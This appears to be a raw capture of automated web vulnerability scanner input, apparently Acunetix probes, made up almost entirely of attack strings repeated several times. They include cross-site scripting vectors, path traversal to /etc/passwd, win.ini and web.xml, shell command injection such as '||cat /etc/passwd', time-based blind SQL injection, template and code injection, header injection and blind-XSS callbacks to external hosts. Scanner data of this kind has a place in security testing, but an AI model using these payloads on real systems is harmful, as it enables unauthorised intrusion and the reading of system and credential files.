\xf6<img acu onmouseover=prompt(944512) //\xf6>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

LSdElojh')

!(()&&!|*|*|

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

1

1<input autofocus onfocus=prompt(902224)>

testasp.vulnweb.com

^(#$!@#$)(()))******

HDqh3hmp'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'

<a href='http://www.acunetix.com'>website security</a>

'

1

1

1

-1

/etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

1

"

"

1

1

-1)

1_1ZcFU <ScRiPt >prompt(964009)</ScRiPt>

1

1

http://hitTtpTA5ECEV.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

-1))

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

comments

&dir

1yaRiZKX'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'&dir&'

http://www.acunetix.tst

comments

1

xx7K0U1O')

1

1

'"

1

file:///etc/passwd

3DphAD87'))

1'"()&%<ScRiPt >prompt(973309)</ScRiPt>

comments/.

"&dir&"

1

1

<!--

1

1

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(963863)</ScRiPt>

1

|dir

1

1

1

1

1_917633

WEB-INF/web.xml

1

1

1

'|dir

1

1

1

WEB-INF\web.xml

1

acu6878\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6878

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

acux8667\xc0\xbez1\xc0\xbcz2a\x90bcxuca8667

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(962094)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(984808)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(948114)</ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?905686></ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(998177)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(963268)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(912123)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(992613))>

1

1

response.write(9972292*9253320)

1

1<iframe src='data:text/html

1

'+response.write(9972292*9253320)+'

WEB-INF/web.xml

1

1

1<body onload=prompt(948406)>

"+response.write(9972292*9253320)+"

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(997157)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(901824)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

"&cat /etc/passwd&"

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(937483)>

${99804+99022}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

cat /etc/passwd

1

1

1<ScRiPt%20>prompt(950555)</sCripT>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

-1)

1

1

)

1

1&n948511=v997147

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

-1))

|cat /etc/passwd#

1

1

1

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(994948) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

zJEFtbQt'

'|'ld

1

testasp.vulnweb.com

1

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(915518)>

/etc/passwd

gIxJuhxl')

'"()

"|"ld

1

1

'

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

qD8aHfBG'))

1

1

1

"

1

1

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

1

1

'

1

${@print(md5(acunetix_wvs_security_test))}

1

1_4tLiT <ScRiPt >prompt(950171)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

http://hitFRFejvTvko.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1))

1

1

acunetix_wvs_invalid_filename

1

1

||cat /etc/passwd

1

1

JihaLwBO'

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

&dir

puFLTQ3j')

http://www.acunetix.tst

1

1

1

/\../\../\../\../\../\../\../etc/passwd

comments

1

'"

qMd05PY5'))

'&dir&'

1'"()&%<ScRiPt >prompt(957787)</ScRiPt>

1

1

comments/.

1

WEB-INF/web.xml

<!--

1

1

"&dir&"

1

'"()&%<ScRiPt >prompt(909788)</ScRiPt>

1

WEB-INF\web.xml

1

|dir

../../../../../../../../../../windows/win.ini

1

1_999571

1

1

1

'|dir

../../../../../../../../../../boot.ini

1

1

acu3614\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3614

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux6651\xc0\xbez1\xc0\xbcz2a\x90bcxuca6651

1

................windowswin.ini

1

1

1<ScRiPt >prompt(986327)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(984894)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(904966)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?904543></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<ScRiPt >prompt(930698)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(947928)">

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972108)"></g></svg>

WEB-INF\web.xml

1

1

1

response.write(9474431*9429289)

1<div style=width:expression(prompt(960892))>

1

1

1

&cat /etc/passwd&

'+response.write(9474431*9429289)+'

1

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

"+response.write(9474431*9429289)+"

1<body onload=prompt(903577)>

1

if(now()=sysdate(),sleep(4.843),0)/*'XOR(if(now()=sysdate(),sleep(4.843),0))OR'"XOR(if(now()=sysdate(),sleep(4.843),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(993376)>

1

1

(select(0)from(select(sleep(4.843)))v)/*'+(select(0)from(select(sleep(4.843)))v)+'"+(select(0)from(select(sleep(4.843)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(996232)>

1

1

../../../../../../../../../../etc/passwd.jpg

-1

1

1

`cat /etc/passwd`

1<img/src=">" onerror=alert(971854)>

1

1

1

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

${100245+100461}

1<ScRiPt%20>prompt(907509)</sCripT>

1

'|'ld

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1&n915324=v940939

1&lt

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

VihkbBlt'

)

1

\xf6<img acu onmouseover=prompt(991129) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

jiJXy3cl')

1

!(()&&!|*|*|

'"()

testasp.vulnweb.com

1<input autofocus onfocus=prompt(947927)>

RMjEw7hr'))

/etc/passwd

'

1

1

1

^(#$!@#$)(()))******

1

<a href='http://www.acunetix.com'>website security</a>

-1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

"

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

1

1

1

1

1

1_VhVNB <ScRiPt >prompt(942229)</ScRiPt>

&dir

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

http://hitWOk00YPNBo.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

1

'&dir&'

${@print(md5(acunetix_wvs_security_test))}\

qVF7opD8'

1

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

jwriaMsR')

1

file:///etc/passwd

"&dir&"

1

1

1

comments

http://www.acunetix.tst

1

71J8t2US'))

1

|dir

'"

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(938685)</ScRiPt>

1

comments/.

1

1

1

<!--

'|dir

'"()&%<ScRiPt >prompt(962945)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1

1

WEB-INF\web.xml

1_984440

"|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

acu6109\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6109

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acux3795\xc0\xbez1\xc0\xbcz2a\x90bcxuca3795

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(909759)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(929239)</script>

1

1

1

1

1<ScRiPt >prompt(945872)</ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?914541></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(970830)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(981301)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998408)"></g></svg>

1

1<div style=width:expression(prompt(902973))>

1

response.write(9755935*9997407)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

'+response.write(9755935*9997407)+'

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(951663)>

"+response.write(9755935*9997407)+"

WEB-INF/web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(915199)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1

1

1

1<img src=xyz OnErRor=prompt(950567)>

1

../../../../../../../../../../etc/passwd.jpg

1

-1

1

1

1<img/src=">" onerror=alert(972172)>

`cat /etc/passwd`

1

${100343+99870}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

1

1

1<ScRiPt%20>prompt(968954)</sCripT>

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1&lt

1&n905775=v957802

1

)

'|'ld

1some_inexistent_file_with_long_name%00.jpg

\xf6<img acu onmouseover=prompt(949680) //\xf6>

1

ITpu73y4'

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

'"()

1<input autofocus onfocus=prompt(959478)>

"|"ld

1

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

nMU2SSCE')

1

<a href='http://www.acunetix.com'>website security</a>

1

1

testasp.vulnweb.com

^(#$!@#$)(()))******

4gHQvsCF'))

/etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

-1

1_O7DDz <ScRiPt >prompt(965264)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

1

"

acunetix_wvs_invalid_filename

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

http://hit17HcBsrLqM.bxss.me/

||cat /etc/passwd

-1))

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

W4LNFVN7'

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'&dir&'

http://www.acunetix.tst

Wglysr25')

comments/.

1

1

file:///etc/passwd

'"

1

1'"()&%<ScRiPt >prompt(961451)</ScRiPt>

IBhXPvJy'))

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

'"()&%<ScRiPt >prompt(904042)</ScRiPt>

1

1

1

|dir

1

WEB-INF/web.xml

1_971021

1

1

1

1

'|dir

1

WEB-INF\web.xml

1

1

"|dir

acu5609\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5609

1

../../../../../../../../../../windows/win.ini

1

acux5753\xc0\xbez1\xc0\xbcz2a\x90bcxuca5753

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(916871)</ScRiPt>

1

1

1<script>prompt(957268)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(905621)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?996375></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(940592)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(922757)">

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903624)"></g></svg>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(953127))>

1

1

response.write(9967214*9748031)

1

1<iframe src='data:text/html

1

1

'+response.write(9967214*9748031)+'

&cat /etc/passwd&

1

WEB-INF/web.xml

1<body onload=prompt(956956)>

1

1

"+response.write(9967214*9748031)+"

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

'&cat /etc/passwd&'

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(964700)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img src=xyz OnErRor=prompt(941725)>

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

-1

1

1<img/src=">" onerror=alert(912322)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1

1

-1)

1

1

1<ScRiPt%20>prompt(946792)</sCripT>

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

-1))

1

1

1&lt

${99189+99219}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

lCZaehLm'

1

\xf6<img acu onmouseover=prompt(979617) //\xf6>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1&n998832=v952589

1some_inexistent_file_with_long_name%00.jpg

1

NlkNDmCJ')

)

1<input autofocus onfocus=prompt(990855)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

2RMyLet4'))

!(()&&!|*|*|

<a href='http://www.acunetix.com'>website security</a>

'"()

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

1

-1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

/etc/passwd

'

1

'

1

-1)

1

1_rlMpH <ScRiPt >prompt(923192)</ScRiPt>

1

1

"

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

1

1

1

1

http://hitnKg51NaKeY.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

w0B6a0hA'

1

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

SjqJCnZX')

1

1

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

DVRVHjOZ'))

http://www.acunetix.tst

1

comments

1

'"

1

"&dir&"

1

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(913046)</ScRiPt>

comments/.

1

<!--

1

1

|dir

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(965081)</ScRiPt>

1

1

1

1

'|dir

1

WEB-INF/web.xml

1_922282

1

1

"|dir

1

1

1

WEB-INF\web.xml

1

acu8018\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8018

1

1

1

1

../../../../../../../../../../windows/win.ini

acux4077\xc0\xbez1\xc0\xbcz2a\x90bcxuca4077

1

1

1

1

1<ScRiPt >prompt(913225)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1<script>prompt(933993)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(950837)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936902></ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(941482)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(904433)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(997773)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9554799*9065922)

1<div style=width:expression(prompt(996850))>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9554799*9065922)+'

1<iframe src='data:text/html

&cat /etc/passwd&

1

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1<body onload=prompt(978802)>

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9554799*9065922)+"

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(909689)>

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1<img src=xyz OnErRor=prompt(996809)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

WEB-INF\web.xml

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

`cat /etc/passwd`

1<img/src=">" onerror=alert(994691)>

1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

|cat /etc/passwd#

1<ScRiPt%20>prompt(928883)</sCripT>

1

${99796+100378}

1

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

)

1&n910064=v928546

1

"|"ld

\xf6<img acu onmouseover=prompt(939543) //\xf6>

1

QWIpwB0P'

1some_inexistent_file_with_long_name%00.jpg

/etc/passwd

!(()&&!|*|*|

1

1

1<input autofocus onfocus=prompt(998226)>

VfdXLiVq')

1

'"()

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

1

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

Vn0IsjEB'))

1

'

'

testasp.vulnweb.com

1

1

[url=http://www.acunetix.com]website security[/url]

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1

1

1

"

"

1_mcqXA <ScRiPt >prompt(955436)</ScRiPt>

1

1

-1)

1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

file:///etc/passwd

-1))

acunetix_wvs_invalid_filename

1

http://hittffWqIZ44N.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

HacXuX5Z'

/\../\../\../\../\../\../\../etc/passwd

&dir

comments

1

1

1

1

1

1

m4dtY2ZQ')

WEB-INF/web.xml

http://www.acunetix.tst

comments

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'"

1

C8Cf7gct'))

WEB-INF\web.xml

comments/.

1

"&dir&"

1

1'"()&%<ScRiPt >prompt(943783)</ScRiPt>

1

<!--

1

1

1

../../../../../../../../../../windows/win.ini

|dir

1

'"()&%<ScRiPt >prompt(942978)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../boot.ini

'|dir

1_997547

1

../../../../../../../../../../windows/win.ini.jpg

1

1

"|dir

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu10817\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10817

1

................windowswin.ini

1

1

acux3213\xc0\xbez1\xc0\xbcz2a\x90bcxuca3213

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(954520)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(993545)</script>

1

1

1

1

1<ScRiPt >prompt(967250)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?971850></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(936732)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(942219)">

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(982689)"></g></svg>

1

1

WEB-INF\web.xml

response.write(9352911*9825626)

1

1

1<div style=width:expression(prompt(937691))>

1

1

'+response.write(9352911*9825626)+'

1

1

1<iframe src='data:text/html

1

1

"+response.write(9352911*9825626)+"

1

&cat /etc/passwd&

1<body onload=prompt(960377)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903728)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=xyz OnErRor=prompt(990782)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

-1

1<img/src=">" onerror=alert(928214)>

1

1

1

${100070+99374}

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt%20>prompt(997774)</sCripT>

1

-1)

1
